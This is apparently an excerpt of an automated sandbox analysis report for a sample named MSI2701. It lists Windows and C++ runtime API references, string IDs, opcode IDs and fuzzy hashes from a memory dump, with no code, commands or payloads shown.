• Instruction ID: 7b3b658ea281298bb039935d80ad1e395d6d40f243c9c0f3e877172c4820ea3e
• Instruction Fuzzy Hash: 01617FB1D00748DBDB10CFA4C841B9EBBF4FF14304F14825EE855AB281E779AA44CB95
APIs
• __EH_prolog3_GS.LIBCMT ref: 004DD501
• _swprintf.LIBCMT ref: 004DD573
  • Part of subcall function 004D254E: __EH_prolog3.LIBCMT ref: 004D2555
  • Part of subcall function 004D254E: std::_Lockit::_Lockit.LIBCPMT ref: 004D255F
  • Part of subcall function 004D254E: std::_Lockit::~_Lockit.LIBCPMT ref: 004D25D0
  • Part of subcall function 004D2FC8: __EH_prolog3.LIBCMT ref: 004D2FCF
Strings
Similarity
• API ID: H_prolog3Lockitstd::_$H_prolog3_Lockit::_Lockit::~__swprintf
• String ID: 2N$%.0Lf
• API String ID: 3050236999-2843531961
• Opcode ID: 47a06889251c51c90a23bd3a554357e5d8260d1e64caffc6a2b8463c08631a5b
• Instruction ID: dc3d84089b4e3a240f23cd7ba135b5935ff104d799707dca1d685804534b3bc0
• Instruction Fuzzy Hash: 48417A71D00209ABCF05DFE0D865AED7BB5FB08304F10444AE846AB395DB399916CF95
APIs
• __EH_prolog3_GS.LIBCMT ref: 004DD7A5
• _swprintf.LIBCMT ref: 004DD817
  • Part of subcall function 004C8610: std::_Lockit::_Lockit.LIBCPMT ref: 004C8657
  • Part of subcall function 004C8610: std::_Lockit::_Lockit.LIBCPMT ref: 004C8679
  • Part of subcall function 004C8610: std::_Lockit::~_Lockit.LIBCPMT ref: 004C86A1
  • Part of subcall function 004C8610: std::_Lockit::~_Lockit.LIBCPMT ref: 004C880E
Strings
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
• String ID: 2N$%.0Lf
• API String ID: 1487807907-2843531961
• Opcode ID: 95f4843f76c6bfd6b89ee6156dea84ef53290be2f1e07f8064e2c4835b75d0ab
• Instruction ID: 6285b4b44d85a2a6766e87567d7bdeaad2cf64c2f445e85c69ad4db456ab547e
• Instruction Fuzzy Hash: D9418D75E00208ABCF05EFE0C854AED7BB5FF08304F20445AE855AB395DB389916DF94
APIs
• __EH_prolog3_GS.LIBCMT ref: 004E188E
• _swprintf.LIBCMT ref: 004E1900
  • Part of subcall function 004C9270: std::_Lockit::_Lockit.LIBCPMT ref: 004C92A0
  • Part of subcall function 004C9270: std::_Lockit::_Lockit.LIBCPMT ref: 004C92C2
  • Part of subcall function 004C9270: std::_Lockit::~_Lockit.LIBCPMT ref: 004C92EA
  • Part of subcall function 004C9270: std::_Lockit::~_Lockit.LIBCPMT ref: 004C9422
Strings
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
• String ID: 2N$%.0Lf
• API String ID: 1487807907-2843531961
• Opcode ID: 433fc711fdc4edefe28a1cfeb23870dc27a0c61ffebdaa6f917d2b7341d0b652
• Instruction ID: 978a8bf3871755553b7576374bff987791f0e3fc98b1c3d6c70c71ef313f5e9b
• Instruction Fuzzy Hash: 21419DB5E00308ABCF05EFD1C844ADD7BB5FF08305F20854AE845AB2A1DB799916CF98
APIs
• __EH_prolog3.LIBCMT ref: 004D838D
  • Part of subcall function 004D1C42: _Maklocstr.LIBCPMT ref: 004D1C62
  • Part of subcall function 004D1C42: _Maklocstr.LIBCPMT ref: 004D1C7F
  • Part of subcall function 004D1C42: _Maklocstr.LIBCPMT ref: 004D1C9C
  • Part of subcall function 004D1C42: _Maklocchr.LIBCPMT ref: 004D1CAE
  • Part of subcall function 004D1C42: _Maklocchr.LIBCPMT ref: 004D1CC1
• _Mpunct.LIBCPMT ref: 004D841A
• _Mpunct.LIBCPMT ref: 004D8434
Strings
Similarity
• API ID: Maklocstr$MaklocchrMpunct$H_prolog3
• String ID: $+xv
• API String ID: 2939335142-1686923651
• Opcode ID: 37d7fab174b896c7283cf2572148e3dd376c219168b99cbfce9cd97d2228c4ce
• Instruction ID: 01f6fd9e89a0fce006346fd209f1d710de9518243e45ba774c21628ba69f02fd
• Instruction Fuzzy Hash: 052192B1904A926ED725DF76849077BBEE8AB08705B04055FE499C7A42E738EA01CB94
APIs
Strings
Similarity
• API ID: Mpunct$H_prolog3
• String ID: $+xv
• API String ID: 4281374311-1686923651
• Opcode ID: d038d0831054adfb5b14861934a63ee362208f823b7ff0e7064f9bbd220df03d
• Instruction ID: 1f3941ff51af18df22663212165c6280d5148a56691b5e36c8a066a7f11972a5
• Instruction Fuzzy Hash: 3621B2B1904B926ED721DF76849073BBEF8AB08305F04095FE4A9C7A42D378EA41CB94
APIs
• LocalAlloc.KERNEL32(00000040,?,?,?,?,?,004C1434,?,00000000), ref: 004C2569
• LocalAlloc.KERNEL32(00000040,?,?,?,?,?,004C1434,?,00000000), ref: 004C2589
• LocalFree.KERNEL32(?,004C1434,?,00000000), ref: 004C25DF
• CloseHandle.KERNEL32(00000000,C7C71CC4,?,00000000,00503C40,000000FF,00000008,?,?,?,?,004C1434,?,00000000), ref: 004C2633
• LocalFree.KERNEL32(?,C7C71CC4,?,00000000,00503C40,000000FF,00000008,?,?,?,?,004C1434), ref: 004C2647
Similarity
• API ID: Local$AllocFree$CloseHandle
• String ID:
• API String ID: 1291444452-0
• Opcode ID: 10773e673e9a41ab20d594d8d86460cb79a56932227c754e8a4fb11023261790
• Instruction ID: f56e947dcf1a8929741f95d1deb68b71abd77a7aa19cbb8d90395e4ddcd54ca3
                                                                                                                                                            • Opcode Fuzzy Hash: 10773e673e9a41ab20d594d8d86460cb79a56932227c754e8a4fb11023261790
                                                                                                                                                            • Instruction Fuzzy Hash: C541193A600215ABC3549F28D954F5BB7D8EB49360F10462FF526C73D0DBF8E9448758
APIs
• LocalFree.KERNEL32(004C9C9B), ref: 004CACD1
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: FreeLocal
• String ID: @TQ$@TQ$TQ
• API String ID: 2826327444-1854491024
APIs
• GetConsoleOutputCP.KERNEL32(C7C71CC4,?,00000000,?), ref: 00501DFE
  • Part of subcall function 004FA9BB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,004F6F5E,?,00000000,-00000008), ref: 004FAA67
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00502059
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 005020A1
• GetLastError.KERNEL32 ref: 00502144
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
• String ID:
• API String ID: 2112829910-0
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,C7C71CC4), ref: 004CCD1C
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 004CCD3C
• WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 004CCD6D
• CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 004CCD86
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: File$CloseCreateHandlePointerWrite
• String ID:
• API String ID: 3604237281-0
APIs
• WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00503053,?,00000001,?,?,?,00502198,?,?,00000000), ref: 0050369D
• GetLastError.KERNEL32(?,00503053,?,00000001,?,?,?,00502198,?,?,00000000,?,?,?,0050271F,?), ref: 005036A9
  • Part of subcall function 0050366F: CloseHandle.KERNEL32(FFFFFFFE,005036B9,?,00503053,?,00000001,?,?,?,00502198,?,?,00000000,?,?), ref: 0050367F
• ___initconout.LIBCMT ref: 005036B9
  • Part of subcall function 00503631: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00503660,00503040,?,?,00502198,?,?,00000000,?), ref: 00503644
• WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00503053,?,00000001,?,?,?,00502198,?,?,00000000,?), ref: 005036CE
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• String ID:
• API String ID: 2744216297-0
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: H_prolog3_ctype
• String ID: 2N
• API String ID: 2548254987-2395104290
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: H_prolog3_ctype
• String ID: 2N
• API String ID: 2548254987-2395104290
APIs
• __startOneArgErrorHandling.LIBCMT ref: 004F1AFD
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorHandling__start
                                                                                                                                                            • String ID: pow
                                                                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                                                                            • Opcode ID: bf8e8e71e01f304b1fed62642d4c4ae3308790b87a0faead2f0b2a2ecdf2274a
                                                                                                                                                            • Instruction ID: c51964b39824dcf9ac9845cf4f85b77a9cce06973efe6a3603619a3015dc91b1
                                                                                                                                                            • Opcode Fuzzy Hash: bf8e8e71e01f304b1fed62642d4c4ae3308790b87a0faead2f0b2a2ecdf2274a
                                                                                                                                                            • Instruction Fuzzy Hash: 1D516DA1E0910DC6CB117B14C95537F2B94EB50740F20895BE699823B9FA3D8CA9EB4F

APIs
Strings
Similarity
• API ID: H_prolog3_Initstd::locale::_
• String ID: 2N
• API String ID: 3382595777-2395104290
• Opcode ID: 4278327befb0786d28c3b4f2861ace1914a5c8b94803ca09c814acb2d25b3e39
• Instruction ID: f71f387aaeae9243102441bbd483caf19a65ef1f8b29c848452ebbec847b8152
• Opcode Fuzzy Hash: 4278327befb0786d28c3b4f2861ace1914a5c8b94803ca09c814acb2d25b3e39
• Instruction Fuzzy Hash: 9F71B038D04258ABCF55CFA4D550BEDBBB1AF59308F2440AEE8817B342D7386D46CB58

APIs
Strings
Similarity
• API ID: H_prolog3_Initstd::locale::_
• String ID: 2N
• API String ID: 3382595777-2395104290
• Opcode ID: 8ea5d6ed0f035dfeb18d73085744919303a9263989045b6a9f4186de513e3a2b
• Instruction ID: 00f0d5818abfee44a8cdebb7a7883aba8edbee55cd495a5d9a415536cf2cfa40
• Opcode Fuzzy Hash: 8ea5d6ed0f035dfeb18d73085744919303a9263989045b6a9f4186de513e3a2b
• Instruction Fuzzy Hash: 6F719134D04258ABCF15DFA4D4606EDBBB2AF59314F28409BEC417B362DB389D46CB58

APIs
Strings
Similarity
• API ID: H_prolog3_Initstd::locale::_
• String ID: 2N
• API String ID: 3382595777-2395104290
• Opcode ID: 0f40e2ba3ffdd2fc50c9d7abc256305add1b152b139cd856ab8d49b28604bc63
• Instruction ID: d9fa324d4c00e749337978d492dc9fa9b98c8e13faa125c86b122ff8f80bca74
• Opcode Fuzzy Hash: 0f40e2ba3ffdd2fc50c9d7abc256305add1b152b139cd856ab8d49b28604bc63
• Instruction Fuzzy Hash: BA718D74D04218ABCF14DF95D5B06EDBBB2AF19314F14409BEC82A7391DB385D42CB58

APIs
Strings
Similarity
• API ID: H_prolog3_Initstd::locale::_
• String ID: 2N
• API String ID: 3382595777-2395104290
• Opcode ID: 57dcb0b518b20c6b4b7eb146e82b6bfbb8e8e6a7ce97d837c00c372c6720ac07
• Instruction ID: 63223bc8cf8bcba491db3b6cb05cd56867e8d1bdd594d78f2068cfa9551357aa
• Opcode Fuzzy Hash: 57dcb0b518b20c6b4b7eb146e82b6bfbb8e8e6a7ce97d837c00c372c6720ac07
• Instruction Fuzzy Hash: E571BE34A05258ABCF14DF95C5A0AEDBBB1AF19314F14404BEC426B3A1EB386D42CB58

APIs
Strings
Similarity
• API ID: __aulldiv
• String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
• API String ID: 3732870572-1956417402
• Opcode ID: b2d9bbb78ba47d0df95b67ceb375ae015c3ffa61da4d6147042d88ec4efbe3e0
• Instruction ID: 5b05693a76ca91da43256e63829409c45405774a9ef2720395bea3e960ddde99
• Opcode Fuzzy Hash: b2d9bbb78ba47d0df95b67ceb375ae015c3ffa61da4d6147042d88ec4efbe3e0
• Instruction Fuzzy Hash: 6551F330B442C59ADF258EAF8481BBF7BB9AF05352F14445BE981D73A1C3788942CB99

APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 004CBF6E
Strings
Similarity
• API ID: Concurrency::cancel_current_task
• String ID: false$true
• API String ID: 118556049-2658103896
• Opcode ID: 26378d2e26ca353ce1f0c986bedc52194bae246626b5f55fdbd830e33489f92b
• Instruction ID: 081dd8fd24319a2a2354b51da446820a51ad1117006ee962fe1a8c96e44649b6
• Opcode Fuzzy Hash: 26378d2e26ca353ce1f0c986bedc52194bae246626b5f55fdbd830e33489f92b
• Instruction Fuzzy Hash: 9F51C4B5D007489FDB10CFA5C841BEEBBB8FF44304F14425EE805A7241E775A985CB95

Strings
Similarity
• API ID:
• String ID: \\?\$\\?\UNC\
• API String ID: 0-3019864461
• Opcode ID: 6f985207577bb3b59bd6a182ecc051afa2cd390bd726dee1459516f6a99a3016
• Instruction ID: f8344111a11d6f644b775ec91730ab39a25ebe05270e909170327e215e152f62
• Opcode Fuzzy Hash: 6f985207577bb3b59bd6a182ecc051afa2cd390bd726dee1459516f6a99a3016
• Instruction Fuzzy Hash: 6D51EF74A042089BDB14CF64C985FAEBBB5FF89304F14451EE401A7381DBB8A984CF98

APIs
• EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 004E607E
Strings
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: EncodePointer
                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                            • API String ID: 2118026453-2084237596
                                                                                                                                                            • Opcode ID: ce91e8df8bfe1a3a328eae190c39c4c4f235627521d508f5266a7e22e569a364
                                                                                                                                                            • Instruction ID: bd51ac577532cc1671bf1cdf73ff67a16e08c2ca966096d4f7ab50b6cfb38332
                                                                                                                                                            • Opcode Fuzzy Hash: ce91e8df8bfe1a3a328eae190c39c4c4f235627521d508f5266a7e22e569a364
                                                                                                                                                            • Instruction Fuzzy Hash: E441CA71900289EFCF16CF9ACC81AEEBBB5FF18345F19809AF90867212D3399950CB54
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog3___cftoe
                                                                                                                                                            • String ID: !%x
                                                                                                                                                            • API String ID: 855520168-1893981228
                                                                                                                                                            • Opcode ID: 34db278f776f6c253f0d744cd3a18c3e5e4de3eddcbb6029cdb15418aa64994c
                                                                                                                                                            • Instruction ID: 502792683222942e4c130ae414a96c6cc117670b3faa0d1f724fc244f7e3491f
                                                                                                                                                            • Opcode Fuzzy Hash: 34db278f776f6c253f0d744cd3a18c3e5e4de3eddcbb6029cdb15418aa64994c
                                                                                                                                                            • Instruction Fuzzy Hash: 27318B71D0020DEBDF04EF95E991AEEB7B5FF08308F10441AF905AB251DB79AA45CB68
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog3___cftoe
                                                                                                                                                            • String ID: !%x
                                                                                                                                                            • API String ID: 855520168-1893981228
                                                                                                                                                            • Opcode ID: c3e41ce37db6bbabe0d234ea860c3e57e9e59d06c0ab525cfc3a0f1eb9889029
                                                                                                                                                            • Instruction ID: 7026f99a643e665c1d91994efa9826b1ed21ac9145f5ef3db0fd578fac907b58
                                                                                                                                                            • Opcode Fuzzy Hash: c3e41ce37db6bbabe0d234ea860c3e57e9e59d06c0ab525cfc3a0f1eb9889029
                                                                                                                                                            • Instruction Fuzzy Hash: B5319A31D05288AFDF01DF95E981EFEBBB5EF19305F10002AF844A7252D7799A45CBA8
                                                                                                                                                            APIs
                                                                                                                                                            • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 004C5F86
                                                                                                                                                            • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,C7C71CC4), ref: 004C5FF6
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConvertFreeLocalString
                                                                                                                                                            • String ID: Invalid SID
                                                                                                                                                            • API String ID: 3201929900-130637731
                                                                                                                                                            • Opcode ID: 203dcb540cd8f36a01cbe1e9b7db76c484b8bc71af2a47ac55ffbda19249884c
                                                                                                                                                            • Instruction ID: f85b18ffdb052a7dde3378936928651ba8b153c6f6c03cd2a331a2cb69be6390
                                                                                                                                                            • Opcode Fuzzy Hash: 203dcb540cd8f36a01cbe1e9b7db76c484b8bc71af2a47ac55ffbda19249884c
                                                                                                                                                            • Instruction Fuzzy Hash: 6321D274A04609DBDB14CF58C815BAFBBF8FF48718F104A1EE401A7380D7BA6A448BD4
                                                                                                                                                            APIs
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004C909B
                                                                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004C90FE
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                            • API String ID: 3988782225-1405518554
                                                                                                                                                            • Opcode ID: 1e0be955be93bb8b3594d4e262cb7b034ba9ee99c4c65e090d0a09d892e14ddf
                                                                                                                                                            • Instruction ID: cff5e573ae7dd5c9d4e16337ee6a19b339eef92a7c0d7ad888d7189d493df295
                                                                                                                                                            • Opcode Fuzzy Hash: 1e0be955be93bb8b3594d4e262cb7b034ba9ee99c4c65e090d0a09d892e14ddf
                                                                                                                                                            • Instruction Fuzzy Hash: A5210570805B84DED721CF68C90478BBFF4EF19314F00869ED49597781D3B9A604CBA5
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog3_
                                                                                                                                                            • String ID: false$true
                                                                                                                                                            • API String ID: 2427045233-2658103896
                                                                                                                                                            • Opcode ID: 9f529719a46f4c2ac24699e7a2c1f88eb0a022974e72caaed4871f255c30d970
                                                                                                                                                            • Instruction ID: 9b36a60b407f9167d183ac3211846239c6f92b65935f90370d2fc797a9d889ae
                                                                                                                                                            • Opcode Fuzzy Hash: 9f529719a46f4c2ac24699e7a2c1f88eb0a022974e72caaed4871f255c30d970
                                                                                                                                                            • Instruction Fuzzy Hash: 2511D075900744EEC720EFB6D841B8ABBF4AF04304F04C56FE5959B352EA38E549CB54
                                                                                                                                                            APIs
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D0D30
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D0D8B
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 593203224-2395104290
                                                                                                                                                            • Opcode ID: 3e77d73dac7966c01db575da67ff50cf34d999754be76ff72f925f95971adf9d
                                                                                                                                                            • Instruction ID: 630f62734b049f2ada8427d912d141095eb2e18b465fd659b95a75615f082736
                                                                                                                                                            • Opcode Fuzzy Hash: 3e77d73dac7966c01db575da67ff50cf34d999754be76ff72f925f95971adf9d
                                                                                                                                                            • Instruction Fuzzy Hash: 66019E35600608AFCB14DF55C861A9E7BB6EF98350F14009BE8069B361DB70FE41CBA4
                                                                                                                                                            APIs
                                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 004F77AF
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: CountCriticalInitializeSectionSpin
• String ID: 2N$InitializeCriticalSectionEx
• API String ID: 2593887523-1053568252
• Opcode ID: 870e2ab7a0aad8bc3687c5863e5baa702e5195f8eb1c37f8b2c65048fe303389
• Instruction ID: a34d6b124700341912dbc93a1877e977c76489d9d8958c70093f8d3eab1d3a65
• Opcode Fuzzy Hash: 870e2ab7a0aad8bc3687c5863e5baa702e5195f8eb1c37f8b2c65048fe303389
• Instruction Fuzzy Hash: 54E0923659421DBBEB112F61DC45D9E7F61FB04760B004011FE08651A1DB759821EAD4
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: Alloc
• String ID: 2N$FlsAlloc
• API String ID: 2773662609-4087932535
• Opcode ID: 721f6e5a1d1944565fc16475362cb19e316b0e4fe7cd83525240327cb68b7294
• Instruction ID: 04b1d2a15ad72989cab69fa46d038d071b49f51eb8ef26e613162d5df7e0bca5
• Opcode Fuzzy Hash: 721f6e5a1d1944565fc16475362cb19e316b0e4fe7cd83525240327cb68b7294
• Instruction Fuzzy Hash: 31E0C233A8832CB7D72127619C06EAEBD55EF58B60B040032FE04192D19BAE5812E2DA
APIs
• FreeLibrary.KERNEL32(0051E428), ref: 004F7932
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
